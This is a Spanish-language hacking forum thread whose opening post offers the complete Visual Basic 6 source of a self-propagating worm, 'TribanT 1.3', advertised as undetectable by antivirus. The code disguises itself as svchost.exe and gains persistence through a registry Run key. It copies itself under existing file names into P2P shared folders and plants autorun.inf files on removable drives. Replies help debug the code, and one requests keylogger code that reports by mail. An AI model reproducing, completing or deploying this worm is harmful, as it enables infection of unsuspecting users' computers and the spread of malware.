Junio 17, 2018, 09:54:35 pm

Autor Tema: [VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!  (Leído 10046 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Dober-ManN

  • Me das tu IP?
  • *
  • Mensajes: 51
  • Sexo: Masculino
    • Ver Perfil
Bueno, aqui les dejo el source del mejor worm que programe hace ya como un año, es el Tribant en la vercion 1.3 con el codigo mucho mas simplificado y achicado. Aqui, en este subforo, publique la vercion 1.0, pero era muyyy largo el code y muy pesado el archivo (antes 104kb, ahora 40 kb :D)
Aqui la informacion sobre el Worm:



Nombre: Tribant
Tamaño del virus: 40 kb
Nombre Tecnico: W32-TRIBANT.VB worm
Tipo: Gusano
Propagacion: P2P y USB.
Autor: Dober-ManN
Programado en: Visual Basic 6


EFECTOS:

Al abrirce, verifica si se encuentra infectada la PC victima, si no lo esta, se copia a "%windir%\svchost.exe".
Cambia sus propiedades a: _Solo lectura.
                                           _Oculto.
                                           _Archivo del sistema.

Se agrega al registro en "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost" para iniciarce con el sistema.
Ejecuta el archivo "%windir%\svchost.exe", luego se autocierra y comienza la propagacion.


PROPAGACION P2P:

Para la propagacion P2P, analiza todas las carpetas compartidas de los programas P2P en busca de archivos.

Extrae los nombre de estos archivos y se autocopia con estos nombres en todas la carpetas compartidas de los programas P2P.

Carpetas de los programas P2P en los que funciona este gusano: C:\Archivos de programa\Grokster\My Grokster\
                                                                                               C:\Archivos de programa\Morpheus\My Shared Folder\
                                                                                               C:\Archivos de programa\ICQ\shared files\
                                                                                               C:\Archivos de programa\KaZaA\My Shared Folder\
                                                                                               C:\Archivos de programa\KaZaA Lite\My Shared Folder\
                                                                                               C:\Archivos de programa\EDONKEY2000\incoming\
                                                                                               C:\Archivos de programa\eMule\Incoming\
                                                                                               C:\Archivos de programa\Filetopia3\Files\
                                                                                               C:\Archivos de programa\appleJuice\incoming\
                                                                                               C:\Archivos de programa\Gnucleus\Downloads\
                                                                                               C:\Archivos de programa\LimeWire\Shared\
                                                                                               C:\Archivos de programa\Overnet\incoming\
                                                                                               C:\Archivos de programa\Shareaza\Downloads\
                                                                                               C:\Archivos de programa\Swaptor\Download\
                                                                                               C:\Archivos de programa\WinMX\My Shared Folder\
                                                                                               C:\Archivos de programa\Tesla\Files\
                                                                                               C:\Archivos de programa\XoloX\Downloads\
                                                                                               C:\Archivos de programa\Rapigator\Share\
                                                                                               C:\Archivos de programa\KMD\My Shared Folder\
                                                                                               C:\Archivos de programa\BearShare\Shared\
                                                                                               C:\Archivos de programa\Direct Connect\Received Files\




PROPAGACION USB:

Para la propagacion USB, se autocopia con el nombre de "system.exe" y crea el archivo "autorun.inf" en las unidades desde la E:\ hasta la Z:\ cada 5s.
Cambia las propiedades del los archivos "autorun.inf" y "system.exe" a: _Solo lectura.
                                                                                                          _Oculto.
                                                                                                          _Archivo del sistema.





Solo deven agregar un Timer con el nombre Timer1 y un FileListBox con el nombre File1 y copiar este code en el formulario.

Código: You are not allowed to view links. Register or Login
'=========================================================================
'                        TRIBANT by Dober-ManN
'
'Nombre: TRIBANT
'Tipo: Gusano(Gusano de Internet)
'Propagación: P2P
'Autor: Dober-ManN
'Email: dober-mann:-com
'Este código es %100 MIO.
'
'Efectos: Al abrirce, verifica si se encuentra en la pc victima, si no
'esta infectada, se copia al directorio de windows con el nombre
'"svchost.exe", luego ejecuta este ultimo archivo copiado y se cierra el
'original. Luego, ya ejecutado y listo, comienza la popagacion.
'
'
'****************************Propagacion P2P*****************************
' Para propagarse por P2P, localiza todos los archivos que existan en las
'carpetas compartidas de los programas P2P, mas adelante mencionados,
'mediante un FileListBox, saca el nombre de estos archivos y luego se
'copia a si mismo en todas las carpetas compartidas de los programas P2P
'con los nombres extraidos de estas.
'************************************************************************
'
'****************************Propagacion USB*****************************
' Para propagarce por USB, se copia cada 5s en una unidad de la E: a la Z
'con el nombre de system.exe y crea un autorun para que se inicie este
'archivo cuando abran la unidad.
'************************************************************************
'
' Cualquier duda, mi messenger es o dober-mann:-com
' (prefiero que me pregunten por el 1º, ya que paso mas
' a menudo por este.
' Saludos.
'========================================================================

Dim system As String
Dim Windir As String                                  'Variable de el directorio de windows.
Dim Yo As String                                      'Variable de mi ubicacion.
Dim Autorun1 As String                                'Variable con el contenido del autorun.(Prop. USB)
Dim cda As String                                     'Variable de la Cantidad De Archivos (CDA).(Prop. P2P)
Dim arch As String                                    'Variable de el nombre del archivo al que me voy a copiar.(Prop. P2P)
Dim archpro As String                                 'Variable de la ubicacion de la carpeta Archivos de Programas.(Prop. P2P)
Dim nombre() As String                                'Variable con la cual solo sacaremos el nombre sin la extencion.(Prop. P2P)
Dim CarpAct As String

Private Sub Form_Load()

On Error Resume Next

  App.TaskVisible = False
  
  Me.Visible = False
  
  system = Environ(StrReverse("ridniw")) & "\svchost.exe"        'Le asignamos una ruta a la variable "system".

  Yo = App.Path & "\" & App.EXEName & ".exe"          'Le asignamos la ruta en la que nos encontramos a la variable "Yo".

  If Yo = system Then                                 'Si yo estoy en la ruta de system,
    If App.PrevInstance = True Then End               'si ya estoy ejecutandome, entonces me finalizo,
    Call PropagacionP2P                               'y comenzamos la propagacion P2P,
    Call PropagacionUSB                               'y luego la propagacion por USB.
  End If

  If Yo <> system Then                                'Si yo no estoy en la direccion de la variable "system", entonces,
    
    Shell ("cmd.exe /c Explorer.exe " & App.Path), vbHide 'abrimos la unidad en la que nos encontramos para no levantar sospechas.
    
    If App.PrevInstance = True Then End               'si ya estoy ejecutandome, entonces me finalizo,
    
    If Dir(system) = "" Then                          'Si el archivo "system" no existe entonces, me instalo "Instalarme".
  
      If Right(App.Path, 1) <> "\" Then                                                                        'Si el ultimo caracter de la ubicacion en la que me encuentro, no es un "\" entonces se la agrego.
        Yo = App.Path & "\" & App.EXEName & ".exe"
      Else
        Yo = App.Path & App.EXEName & ".exe"                                                                   'Si ya lo tiene, quiere decir que estamos en una unidad de disco.
      End If
  
      Shell ("cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v Svchost /t REG_SZ /D " & system & " /F"), vbHide    'Nos agregamos al registro

      FileCopy Yo, system                                                   'Nos copiamos a la ubicacion del contenido de la variable "system".                                                                                      'Nos copiamos a la ubicacion del contenido de la variable "system".
      
      Do While Dir(system) = ""
       DoEvents
      Loop
      
      SetAttr system, vbHidden + vbReadOnly + vbSystem                                                         'Nos cambiamos las propiedades a de solo lectura, oculto y del sistema

      Shell system, vbHide                                                                                     'Nos ejecutamos en la dieccion de system

      End                                                                                                      'Nos finalizamos.
    
    Else                                                                                                       'Si existe el archivo system, entonces me fializo.
      End
    End If
 
  End If

End Sub

Private Sub PropagacionP2P()

  On Error Resume Next

  archpro = Environ("programfiles")                    'Le asignamos la direccion en la que se encuentra la carpeta Archivos de Programas a la variable archpro.

  Call propagar                                        'Y empezamos la propagacion.

End Sub

Sub propagar()

On Error Resume Next                                   'En caso de algun error que no se de la alerta.

For A = 1 To 21

Select Case A                                            'A partir de aqui empezamos a darle las direcciones de las carpetas compartidas de los programas P2P a cada FileListBox para que luego, si cada FileListBox tiene la direccion asignada, quiere decir que existe, por lo que podremos escanear los archivos existentes y poder copiarnos con esos nombres.

Case 1
File1.Path = archpro & "\Grokster\My Grokster\"
CarpAct = archpro & "\Grokster\My Grokster"
Case 2
File1.Path = archpro & "\Morpheus\My Shared Folder\"
CarpAct = archpro & "\Morpheus\My Shared Folder"
Case 3
File1.Path = archpro & "\ICQ\shared files\"
CarpAct = archpro & "\ICQ\shared files"
Case 4
File1.Path = archpro & "\KaZaA\My Shared Folder\"
CarpAct = archpro & "\KaZaA\My Shared Folder"
Case 5
File1.Path = archpro & "\EDONKEY2000\incoming\"
CarpAct = archpro & "\EDONKEY2000\incoming"
Case 6
File1.Path = archpro & "\eMule\Incoming\"
CarpAct = archpro & "\eMule\Incoming"
Case 7
File1.Path = archpro & "\appleJuice\incoming\"
CarpAct = archpro & "\appleJuice\incoming"
Case 8
File1.Path = archpro & "\Gnucleus\Downloads\"
CarpAct = archpro & "\Gnucleus\Downloads"
Case 9
File1.Path = archpro & "\LimeWire\Shared\"
CarpAct = archpro & "\LimeWire\Shared"
Case 10
File1.Path = archpro & "\Overnet\incoming\"
CarpAct = archpro & "\Overnet\incoming"
Case 11
File1.Path = archpro & "\Shareaza\Downloads\"
CarpAct = archpro & "\Shareaza\Downloads"
Case 12
File1.Path = archpro & "\Swaptor\Download\"
CarpAct = archpro & "\Swaptor\Download"
Case 13
File1.Path = archpro & "\WinMX\My Shared Folder\"
CarpAct = archpro & "\WinMX\My Shared Folder"
Case 14
File1.Path = archpro & "\Tesla\Files\"
CarpAct = archpro & "\Tesla\Files"
Case 15
File1.Path = archpro & "\XoloX\Downloads\"
CarpAct = archpro & "\XoloX\Downloads"
Case 16
File1.Path = archpro & "\Rapigator\Share\"
CarpAct = archpro & "\Rapigator\Share"
Case 17
File1.Path = archpro & "\KMD\My Shared Folder\"
CarpAct = archpro & "\KMD\My Shared Folder"
Case 18
File1.Path = archpro & "\BearShare\Shared\"
CarpAct = archpro & "\BearShare\Shared"
Case 19
File1.Path = archpro & "\Direct Connect\Received Files\"
CarpAct = archpro & "\Direct Connect\Received Files"
Case 20
File1.Path = archpro & "\KaZaA Lite\My Shared Folder\"
CarpAct = archpro & "\KaZaA Lite\My Shared Folder"
Case 21
File1.Path = archpro & "\Filetopia3\Files\"
CarpAct = archpro & "\Filetopia3\Files"
End Select

If File1.Path = CarpAct Then
  cda = File1.ListCount - 1                                 'Sacamos el numero de archivos que existen - 1 y lo depositamos en la variable cda, ya que nos da el numero de archivos que existen, pero al sacar el nombre, el primer nombre del archivo se lo saca con el numero 0.
  If cda <> "-1" Then                                    'Si cda no es -1 quiere decir que existen archivos por lo que nos empezamos a copiar con esos nombres.
      For B = 0 To cda                                   'Acá hacemos que se repita la instruccion tantas veces como la cantidad de archivos que existan, asi nos vamos copiando con cada nombre.
        arch = File1.List(B)                                'A la variable "arch" le damos el nombre del archivo al que nos vamos a copiar.
        nombre = Split(arch, ".")                        'Separamos a los archivos por un puntos, de este modo, nos copiamos solo con el nombre de estos sin la extencion.
        arch = nombre(0)
        Call Direcciones                                 'Llamamos a la instruccion "Direcciones", en la cual se encuentran las direcciones de las carpetas compartidas de los programas P2P a las que nos vamos a copiar.
      Next B                                             'Pasamos al siguiente archivo.
  End If
End If
  
Next A

End Sub

Sub Direcciones()

On Error Resume Next                                                   'En caso de que no se pueda copiar en una direccion, que
                                                                       'lo intente con la siguiente.
FileCopy Yo, archpro & "\Grokster\My Grokster\" & arch & ".exe"        'Aqui nos copiamos a las carpetas compartidas de los
FileCopy Yo, archpro & "\Morpheus\My Shared Folder\" & arch & ".exe"   'programas P2P, con los nombres que esten en la variable
FileCopy Yo, archpro & "\ICQ\shared files\" & arch & ".exe"            '"arch" en la cual contiene los nombres de los archivos
FileCopy Yo, archpro & "\KaZaA\My Shared Folder\" & arch & ".exe"      'ya existentes en esas carpetas.
FileCopy Yo, archpro & "\EDONKEY2000\incoming\" & arch & ".exe"
FileCopy Yo, archpro & "\eMule\Incoming\" & arch & ".exe"
FileCopy Yo, archpro & "\appleJuice\incoming\" & arch & ".exe"
FileCopy Yo, archpro & "\Gnucleus\Downloads\" & arch & ".exe"
FileCopy Yo, archpro & "\LimeWire\Shared\" & arch & ".exe"
FileCopy Yo, archpro & "\Overnet\incoming\" & arch & ".exe"
FileCopy Yo, archpro & "\Shareaza\Downloads\" & arch & ".exe"
FileCopy Yo, archpro & "\Swaptor\Download\" & arch & ".exe"
FileCopy Yo, archpro & "\WinMX\My Shared Folder\" & arch & ".exe"
FileCopy Yo, archpro & "\Tesla\Files\" & arch & ".exe"
FileCopy Yo, archpro & "\XoloX\Downloads\" & arch & ".exe"
FileCopy Yo, archpro & "\Rapigator\Share\" & arch & ".exe"
FileCopy Yo, archpro & "\KMD\My Shared Folder\" & arch & ".exe"
FileCopy Yo, archpro & "\BearShare\Shared\" & arch & ".exe"
FileCopy Yo, archpro & "\Direct Connect\Received Files\" & arch & ".exe"
FileCopy Yo, archpro & "\KaZaA Lite\My Shared Folder\" & arch & ".exe"
FileCopy Yo, archpro & "\Filetopia3\Files\" & arch & ".exe"
End Sub

Private Sub PropagacionUSB()

  On Error Resume Next                                                 'En caso de error no daremos alerta.

  Yo = App.Path & "\" & App.EXEName & ".exe"                           'Le damos a la variable nosotros, la ubicacion en la que nos ubicamos.

  Autorun1 = "[autorun]" & vbCrLf & "open=system.exe" & vbCrLf & "UseAutoPlay = 1" & _
vbCrLf & "action=@system.exe" & vbCrLf & "shell\open=Abrir" & _
 vbCrLf & "shell\open\Command=system.exe" & vbCrLf & "shell\open\Command=system.exe" _
 & vbCrLf & "shell\open\Default=1" & vbCrLf & "shell\explore=Explorar"                                              'Le damos a la variable autorun1 el contenido del autorun.

  Timer1.Interval = 15000
  
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
For C = 67 To 90
FileCopy Yo, Chr(C) & ":\system.exe"                                          'Me copio a la unidad correspondiente a la variable con nombre "system.exe".
Open Chr(C) & ":\autorun.inf" For Output As #1                                'Creamos un archivo llamado "autorun.inf" que contendra el contenido de la variable "Autorun1".
 Print #1, Autorun1
Close #1
SetAttr Chr(C) & ":\autorun.inf", vbHidden + vbReadOnly + vbSystem          'Le cambiamos los atributos a los archivos
SetAttr Chr(C) & ":\system.exe", vbHidden + vbReadOnly + vbSystem           '"autorun.inf" y "system.exe" a ocultos,'solo lectura y de sistema.
Next C
End Sub


Espero que les guste y que entiendan y aprendan como funciona :P

Saludos
« Última modificación: Febrero 05, 2010, 04:57:37 pm por Dober-ManN »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado ADX

  • Yo vivo en CPH
  • ***
  • Mensajes: 548
    • Ver Perfil
Re: [VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #1 en: Febrero 05, 2010, 04:52:30 pm »
muy buen code!, si bien parece, lo has actualizado, por lo menos la otra version no me acuerdo de algunas partes

alexmanycool

  • Visitante
Re: [VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #2 en: Febrero 05, 2010, 05:27:06 pm »
wow muy interesante, obtienes dos diplomas de bronce...


de donde lo conoces??

salu2

Desconectado ADX

  • Yo vivo en CPH
  • ***
  • Mensajes: 548
    • Ver Perfil
Re: [VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #3 en: Febrero 05, 2010, 05:37:46 pm »
lo habia visto en otro foro, creo q era de elhacker.net u otro parecido.

alexmanycool

  • Visitante
Re: [VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #4 en: Febrero 05, 2010, 05:46:25 pm »
ah en foros de menor importancia... xDD

salu2

Desconectado Dober-ManN

  • Me das tu IP?
  • *
  • Mensajes: 51
  • Sexo: Masculino
    • Ver Perfil
Re: [VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #5 en: Febrero 05, 2010, 06:50:14 pm »
Aqui lo avia publicado antes (el codigo de la vercion 1.0):You are not allowed to view links. Register or Login

Desconectado d4rk4ng3ll

  • Me das tu IP?
  • *
  • Mensajes: 49
  • Fuckpolice
    • Ver Perfil
Re: [VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #6 en: Marzo 25, 2010, 06:35:49 pm »
parece interesante ^^
« Última modificación: Marzo 25, 2010, 06:37:47 pm por d4rk4ng3ll »
El unico delito de un hacker es sobrepasar tu inteligencia.

Desconectado mDrinky

  • Si te metes con CPH
    te metes conmigo
  • ****
  • Mensajes: 2868
    • Ver Perfil
Re: [VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #7 en: Marzo 26, 2010, 12:38:19 am »

Mira la fecha del ultimo post :S 
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Que guapo soy!

Desconectado elmigra

  • Me das tu IP?
  • *
  • Mensajes: 38
  • Sexo: Masculino
  • JASON -RAT
    • Ver Perfil
Re:[VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #8 en: Junio 21, 2012, 03:14:05 pm »
me salta un error en el codigo
 
Código: You are not allowed to view links. Register or Login
For A = 1 To 21
me salta el error
variable no definida
HARDCORE 4 LIFE

Desconectado mDrinky

  • Si te metes con CPH
    te metes conmigo
  • ****
  • Mensajes: 2868
    • Ver Perfil
Re:[VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #9 en: Junio 21, 2012, 05:16:30 pm »
Declara la variable:

dim A as integer

y por favor no revivas temas.

saludos.

Desconectado Gustavo_lobato

  • Me das tu IP?
  • *
  • Mensajes: 4
    • Ver Perfil
Re:[VB] SOURCE TribanT 1.3 propagacion USB y P2P indetectable a los av!!
« Respuesta #10 en: Abril 18, 2015, 12:24:12 pm »
A ver yo necesito que tenga keylogger y haga el reporte por mail alguien tiene el codigo?


xx
Se puede editar el source de un crypter y dejarlo indetectable?

Iniciado por checker

2 Respuestas
1273 Vistas
Último mensaje Junio 27, 2012, 05:48:29 pm
por mcr_bkn
question
Propagación por usb spy-net

Iniciado por Stealhack

2 Respuestas
2845 Vistas
Último mensaje Abril 18, 2010, 01:47:56 pm
por Kodeinfect
xx
ayuda de propagacion

Iniciado por acmisoft

3 Respuestas
1037 Vistas
Último mensaje Agosto 25, 2012, 08:05:06 am
por LauBuru
xx
Propagacion de troyano por Red Lan

Iniciado por roMariiN

2 Respuestas
2330 Vistas
Último mensaje Febrero 28, 2011, 11:15:34 pm
por NeuroADN
question
propagacion bifrost usb

Iniciado por ClouldStriffe20

2 Respuestas
1431 Vistas
Último mensaje Enero 17, 2010, 08:40:02 pm
por TokioDrift
question
Duda propagación USB

Iniciado por MDV1996

31 Respuestas
7709 Vistas
Último mensaje Diciembre 29, 2012, 09:05:54 am
por OnTheCore
question
Método de propagación

Iniciado por | NetWork |

2 Respuestas
1233 Vistas
Último mensaje Febrero 20, 2007, 12:09:07 pm
por | NetWork |
xx
Propagacion archivos rar

Iniciado por Belphegor

4 Respuestas
1187 Vistas
Último mensaje Marzo 25, 2009, 02:33:25 pm
por Germaniac
question
propagacion de troyano

Iniciado por killerboy_cs

2 Respuestas
1002 Vistas
Último mensaje Noviembre 22, 2010, 12:55:30 am
por zeth
xx
Propagacion java

Iniciado por zero1618

3 Respuestas
837 Vistas
Último mensaje Febrero 13, 2011, 05:17:37 pm
por M4g¡0k